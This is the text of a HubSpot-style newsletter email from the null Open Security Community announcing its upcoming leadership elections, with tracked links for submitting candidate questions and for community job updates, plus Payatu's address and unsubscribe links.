null - The Open Security Community is preparing for its upcoming elections! Submit your questions for potential candidates via GitHub: https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_45jMY8W50kH_H6lZ3nvN6Xjl9sXkG90W2YkM_32MTqcxW1GZ2sN4wrQnSW2MGhLx1HYpzyW3gNZtH6T485gVknDzC25Sd7qN6b5t28nrKr4W3gpbhd3nwn5WV96_Nm3wmknhVMX33f2FSw14W5Dq1c75rZTHrW1BKqQT226pSDW2c8B5x16ZcJlW3Kbsyq7g5h-nW8cxfDh1Z1skqW1-QxmT2TkctBW4lCMsm1JCJKmW2MqFJL6V9f0cW5pTyB58RPzhqVRSzQw4g7L1CW4r5ZPQ86cV4wW1rJR6-59ZLWtW6VbG5L6-nMrwW2mNc4H8mM6mQW4GGGP131VbgPW3yWQRh7nTz3DW6QBMq33CSHM7W1dSpvK4tR352W8G30__4P4bgyW6s00nG1lcZyZW69VQJr1j0W5WW1bz5KK62QJstf29fj5P04 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyk_45jMY8W50kH_H6lZ3nvN6Xjl9sXkG90W2YkM_32MTqcxW1GZ2sN4wrQnSW2MGhLx1HYpzyW3gNZtH6T485gVknDzC25Sd7qN6b5t28nrKr4W3gpbhd3nwn5WV96_Nm3wmknhVMX33f2FSw14W5Dq1c75rZTHrW1BKqQT226pSDW2c8B5x16ZcJlW3Kbsyq7g5h-nW8cxfDh1Z1skqW1-QxmT2TkctBW4lCMsm1JCJKmW2MqFJL6V9f0cW5pTyB58RPzhqVRSzQw4g7L1CW4r5ZPQ86cV4wW1rJR6-59ZLWtW6VbG5L6-nMrwW2mNc4H8mM6mQW4GGGP131VbgPW3yWQRh7nTz3DW6QBMq33CSHM7W1dSpvK4tR352W8G30__4P4bgyW6s00nG1lcZyZW69VQJr1j0W5WW1bz5KK62QJstf29fj5P04 ) . Your feedback will help shape the future leadership of null.

Join our Discord Server 👋

Stay updated on the latest job announcements and opportunities in our community: https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3lcq-W7lCdLW6lZ3mSN1rYPzdwB9mRW8bnZP19gYljkW61XSF-5lbBSDW9kRgZ5783hndW7SQScW9dHfnWW24cg8-7g1k4tW5MTCDT39Z25lW6B9t5D3bQFsyW8DLY3H62sFsJN6H1_wpzsHKwW1y0WS-2wXgQTW2HQqNr6nlrmQW7HTlkS2blydMN8G5hm1QFTtVN1_hWxtMsgwfW3T9hgM6W-77GW7F6HKs2_y5v6W52Pvs334vlqGW7R9pjv3hSK7RW5jH-pH6bx5tJW7JzvfR3pTj-vW8MP7m21-hdg5W8j5w9p3Hp3HcW3k67C68Fjz63f5xvHfF04 (https://cTy2804.na1.hubspotlinksstarter.com/Ctc/GE+113/cTy2804/VVCwzM36D4W3W5kdjln8rtsDcW9h8NV35ljxpkN7qyl0g3lcq-W7lCdLW6lZ3mSN1rYPzdwB9mRW8bnZP19gYljkW61XSF-5lbBSDW9kRgZ5783hndW7SQScW9dHfnWW24cg8-7g1k4tW5MTCDT39Z25lW6B9t5D3bQFsyW8DLY3H62sFsJN6H1_wpzsHKwW1y0WS-2wXgQTW2HQqNr6nlrmQW7HTlkS2blydMN8G5hm1QFTtVN1_hWxtMsgwfW3T9hgM6W-77GW7F6HKs2_y5v6W52Pvs334vlqGW7R9pjv3hSK7RW5jH-pH6bx5tJW7JzvfR3pTj-vW8MP7m21-hdg5W8j5w9p3Hp3HcW3k67C68Fjz63f5xvHfF04 )

Payatu Technologies Pvt Ltd., Office No. 502, Tej House, 5th Floor, 5 M.G. Road, Camp, Pune, Maharashtra 411001

Unsubscribe (https://hs-7328024.s.hubspotstarter.net/preferences/en/unsubscribe?data=W2nXS-N30h-BrW3LHlhC34rt-5W2qSxDn2q_nGsW2nTBZy1-XBPFW3DXWqr3Z-_tCW2WqQ3730GyvSW1S2hF03835hXW2YyfNm3JSNdZW2zYXgc24WzKdW2Pvm-h4fsmRdW43F1K13M62zMW2RrG9Z2Wy8kHW4mbnlg3dsp0fW4pyH862313-zW1Bczj53T5WDMW4mytFw45XcXLW3jdkps3_YkSJW32xGwS1ZqWrgW4pB1tk4rvDxMW3QRD2L4tFmCcW3z2X5n4cKGJ8W1_jPkL3DYJ5pW1L7shZ3yXrT1W3gs6ks2HFWFSW4mGpm92TMWDSW32rKK32sVklYW2zPb-71Lmv6XW2CqPVY3T47WMW2sT7Py49TPG1W2RJTzl4mtnMjW1Zgz8l4ftc1FW3XyTv52KSvkzW30c2cn2-g8DjW2sFqnF3Vz5zYW2Ry1N61Ljfl0W3K6FDF1BDJp3W2KZkNq3bcfRYW41tWSP1L3Gn_W49tXYY3ggbJZW2TjQnn3f-nvYW4mrF_s4fnXVLW1ZljCP2qVBl7W3W2mYG4fr5PdW2TzZDB36Fsy4W4cPR5w2PsLMfW3dppWB4mstSlW47wtPz1_nZN9W3H6XWj3C89-df1ZvBy304&_hsenc=p2ANqtz-_4kDnRpYLE-TWAHbI6iNAV0yfG-pGLSCVy_UhGcPYKKegnkWd5NrsrumPiy2SzOiKwRWd8iI3lUz1brTj75EqS1ofT1uSnLYe5ip-U8gHYAz8qiaI&_hsmi=325820415 )  
Manage preferences (https://hs-7328024.s.hubspotstarter.net/preferences/en/manage?data=W2nXS-N30h-BrW3LHlhC34rt-5W2qSxDn2q_nGsW2nTBZy1-XBPFW3DXWqr3Z-_tCW2WqQ3730GyvSW1S2hF03835hXW2YyfNm3JSNdZW2zYXgc24WzKdW2Pvm-h4fsmRdW43F1K13M62zMW2RrG9Z2Wy8kHW4mbnlg3dsp0fW4pyH862313-zW1Bczj53T5WDMW4mytFw45XcXLW3jdkps3_YkSJW32xGwS1ZqWrgW4pB1tk4rvDxMW3QRD2L4tFmCcW3z2X5n4cKGJ8W1_jPkL3DYJ5pW1L7shZ3yXrT1W3gs6ks2HFWFSW4mGpm92TMWDSW32rKK32sVklYW2zPb-71Lmv6XW2CqPVY3T47WMW2sT7Py49TPG1W2RJTzl4mtnMjW1Zgz8l4ftc1FW3XyTv52KSvkzW30c2cn2-g8DjW2sFqnF3Vz5zYW2Ry1N61Ljfl0W3K6FDF1BDJp3W2KZkNq3bcfRYW41tWSP1L3Gn_W49tXYY3ggbJZW2TjQnn3f-nvYW4mrF_s4fnXVLW1ZljCP2qVBl7W3W2mYG4fr5PdW2TzZDB36Fsy4W4cPR5w2PsLMfW3dppWB4mstSlW47wtPz1_nZN9W3H6XWj3C89-df1ZvBy304&_hsenc=p2ANqtz-_4kDnRpYLE-TWAHbI6iNAV0yfG-pGLSCVy_UhGcPYKKegnkWd5NrsrumPiy2SzOiKwRWd8iI3lUz1brTj75EqS1ofT1uSnLYe5ip-U8gHYAz8qiaI&_hsmi=325820415 )

Tag

#google